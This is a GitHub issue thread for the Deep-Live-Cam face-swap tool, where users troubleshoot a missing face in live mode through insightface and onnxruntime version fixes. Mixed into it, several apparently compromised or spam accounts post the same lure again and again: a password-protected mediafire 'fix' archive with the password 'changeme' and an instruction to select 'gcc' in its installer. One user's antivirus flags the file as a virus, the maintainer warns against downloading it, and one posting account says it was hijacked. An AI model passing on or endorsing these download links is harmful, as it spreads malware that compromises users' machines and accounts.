### ISSUE TITLE
where is my face in live???

### ISSUE THREAD

**Issue by zaojue405** [hacksider/Deep-Live-Cam#460]
![微信截图_20240826115711](https://github.com/user-attachments/assets/24456fdb-7922-4f70-b763-deeb3bb65e36)

**Comment by hacksider** [comment]
That means you didn't install the right insightface ☺️

**Comment by zaojue405** [comment]
这是来自QQ邮箱的自动回复邮件。
 
您好，我已收到你的来信。我将尽快给您回复。

**Comment by hacksider** [comment]
I'm sorry I can't understand Chinese ☺️

**Comment by zaojue405** [comment]
thank you so much just ignore the Chinese kanji it's auto reply



---Original---
From: "Kenneth ***@***.***&gt;
Date: Mon, Aug 26, 2024 15:18 PM
To: ***@***.***&gt;;
Cc: ***@***.******@***.***&gt;;
Subject: Re: [hacksider/Deep-Live-Cam] where is my face in live??? (Issue#460)




 
I'm sorry I can't understand Chinese ☺️

**Comment by Zhangyanshan13** [comment]
> 这意味着您没有安装正确的 insightface☺️



> That means you didn't install the right insightface ☺️

Sorry, I just installed insightface 0.7.3,but I still have the same problem

**Comment by jack-321** [comment]
Sorry，I meet this problem，too。 python：3.10.0  and Windows10 and CPU 。I‘dont know  which step have issue

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jack-321** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

what’s  this？ my computer  tell me is a  virus

**Comment by hacksider** [comment]
> > Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> 
> 
> what’s  this？ my computer  tell me is a  virus

Please don't download anything outside github

**Comment by hacksider** [comment]
Kindly check which onnx runtime you're using.

**Comment by jack-321** [comment]
> Kindly check which onnx runtime you're using.
1.19.0
 
![image](https://github.com/user-attachments/assets/98c9d5fc-0b02-4ad6-95ca-fc6576d7ca23)

**Comment by hacksider** [comment]
Reccomended version is 1.16.3 as per installation instructions ☺️

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zaojue405** [comment]
> > thank you so much just ignore the Chinese kanji it's auto reply
> > […](#)
> > ---Original--- From: "Kenneth _**@**_._**> Date: Mon, Aug 26, 2024 15:18 PM To: _**@**_.**_>; Cc: _**@**_._**_**@**_.**_>; Subject: Re: [hacksider/Deep-Live-Cam] where is my face in live??? (Issue#460) I'm sorry I can't understand Chinese ☺️ — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you authored the thread.Message ID: _**@**_.***>
> 
> hello，你解决了吗

not yet，蹲一个解决了的人出来回答

**Comment by nxllxvxxd** [comment]
# **不要下载我作为评论发布的任何内容，我的账户已被入侵，并被用来入侵他人的账户**。

**我正在努力删除并在他们使用我的账户发布此内容的所有主题上发布此内容**。

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by guo-qq** [comment]
我也遇到了同样的问题

**Comment by guo-qq** [comment]
，我遇到了类似的问题，请尝试以下命令。
pip uninstall onnxruntime onnxruntime-gpu
pip install onnxruntime-gpu==1.16.3

**Comment by naffan2014** [comment]
如果没用gpu怎么办？
